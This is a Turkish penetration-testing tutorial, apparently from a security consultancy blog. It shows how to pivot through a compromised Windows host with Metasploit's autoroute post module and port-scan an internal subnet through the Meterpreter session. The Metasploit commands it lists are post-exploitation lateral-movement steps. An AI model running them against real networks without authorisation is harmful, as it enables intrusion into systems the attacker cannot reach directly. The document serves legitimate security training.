MSF autoroute Post Modülü Kullanılarak Meterpreter Bağlantısı Elde Edilen Bilgisayar Üzerinden Başka Bir Ağa Erişimin Sağlanması

0
748
views
Sızma testleri sırasında Meterpreter ile bağlantı kurulabilmiş olan bir bilgisayarın farklı ağlara olan erişimi olup olmadığı kontrol edilirek yeni ağlara erişim sağlanır. Bu yazıda, MSF autoroute post modülü kullanılarak, Meterpreter erişimi elde edilmiş bir Windows istemci üzerinden başka bir ağa erişim sağlanacak ve mevcut Meterpreter oturumu üzerinden ağ taraması gerçekleştirilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Bu yazıda saldırgana ait olan Kali bilgisayarın tek bir IP adresi olup bu adres 10.0.0.50’dir. Meterpreter ile erişim elde edilen Windows bilgisayarın ise, 2 ayrı ağa ait olan iki IP değeri vardır. Birincisi, saldırganın istismar ederken erişebildiği 10.0.0.25 IP adresidir. İkincisi ise, saldırgan tarafından direk olarak erişim sağlanamayan 192.168.0.80 IP adresidir.

ifconfig

pivoting-by-using-msf-autoroute-post-module-01

Windows istemci üzerinden 192.168.0.0/24 ağına erişim sağlamak için MSF autoroute post modülü kullanılabilir. Bu amaçla, modül seçilir ve seçenekleri incelenir.

background
route print
search autoroute
use post/windows/manage/autoroute
show options

pivoting-by-using-msf-autoroute-post-module-02

Modüle oturum ID değeri ve erişim sağlanacak ağın bilgisi verilerek modül çalışıtırılır ve yönlendirme tablosuna yeni bir girdi eklenmiş olur.

set SESSION 1
set SUBNET 192.168.0.0/24
show options
run
route print

pivoting-by-using-msf-autoroute-post-module-03

Not: MSF autoroute post modülü ile benzer işlevde olan Meterpreter autoroute betiği de bulunmaktadır. Ancak Meterpreter betiği yerine MSF post modülünün kullanılması tavsiye edilmektedir.

sessions -i 1
run autoroute -h
run autoroute -p

pivoting-by-using-msf-autoroute-post-module-04

Meterpreter oturumunda yönlendirme tablosuna yeni girdi yapılmasıyla, 192.168.0.0/24 ağına gidecek taleplerin mevcut Meterpreter bağlantısı üzerinden gitmesi sağlanmıştır. Bu durumda gerçekleştirilecek olan MSF tcp auxiliary modülü ile port taraması, Meterpreter üzerinden geçecektir. Port taraması için modül seçilir, modüle tarama parametreleri verilir ve modül seçenekleri incelenir.

background
use auxiliary/scanner/portscan/tcp
set PORTS 445
set RHOSTS 192.168.0.0/24
set THREADS 50
show options

pivoting-by-using-msf-autoroute-post-module-05

Böylece, Meterpreter üzerinden başka bir ağda tarama işlemi gerçekleştirilebilir.

run

pivoting-by-using-msf-autoroute-post-module-06

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.